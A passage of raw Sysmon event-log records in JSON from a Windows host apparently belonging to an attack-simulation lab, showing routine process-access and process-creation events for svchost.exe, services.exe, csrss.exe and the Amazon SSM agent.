{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1432,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.221\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.221","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1433,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.221\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.221","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1434,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.221\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.221","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1435,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.221\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.221","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1436,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.221\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.221","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1437,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.221\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.221","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1438,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.871\r\nProcessGuid: {41C8662E-1F73-5F25-0000-00106CBC0200}\r\nProcessId: 2744\r\nImage: C:\\Program Files\\Amazon\\SSM\\amazon-ssm-agent.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\Amazon\\SSM\\amazon-ssm-agent.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=C982D5932238041410A29A1992B365B0,SHA256=585DB96A52F0C60A6DBC0BFCE79C533D6012C8973F8FC0FAEB659F9A5303DCCF,IMPHASH=F0070935B15A909B9DC00BE7997E6112\r\nParentProcessGuid: {41C8662E-1F61-5F25-0000-00102F530000}\r\nParentProcessId: 856\r\nParentImage: C:\\Windows\\System32\\services.exe\r\nParentCommandLine: C:\\Windows\\system32\\services.exe","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.871","ProcessGuid":"{41C8662E-1F73-5F25-0000-00106CBC0200}","Image":"C:\\Program Files\\Amazon\\SSM\\amazon-ssm-agent.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\Amazon\\SSM\\amazon-ssm-agent.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=C982D5932238041410A29A1992B365B0,SHA256=585DB96A52F0C60A6DBC0BFCE79C533D6012C8973F8FC0FAEB659F9A5303DCCF,IMPHASH=F0070935B15A909B9DC00BE7997E6112","ParentProcessGuid":"{41C8662E-1F61-5F25-0000-00102F530000}","ParentProcessId":"856","ParentImage":"C:\\Windows\\System32\\services.exe","ParentCommandLine":"C:\\Windows\\system32\\services.exe","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1439,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.252\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 920\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-00106CBC0200}\r\nTargetProcessId: 2744\r\nTargetImage: C:\\Program Files\\Amazon\\SSM\\amazon-ssm-agent.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\services.exe+12bee|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.252","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","SourceProcessId":"856","SourceThreadId":"920","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-00106CBC0200}","TargetProcessId":"2744","TargetImage":"C:\\Program Files\\Amazon\\SSM\\amazon-ssm-agent.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\services.exe+12bee|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1440,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.252\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-00106CBC0200}\r\nTargetProcessId: 2744\r\nTargetImage: C:\\Program Files\\Amazon\\SSM\\amazon-ssm-agent.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 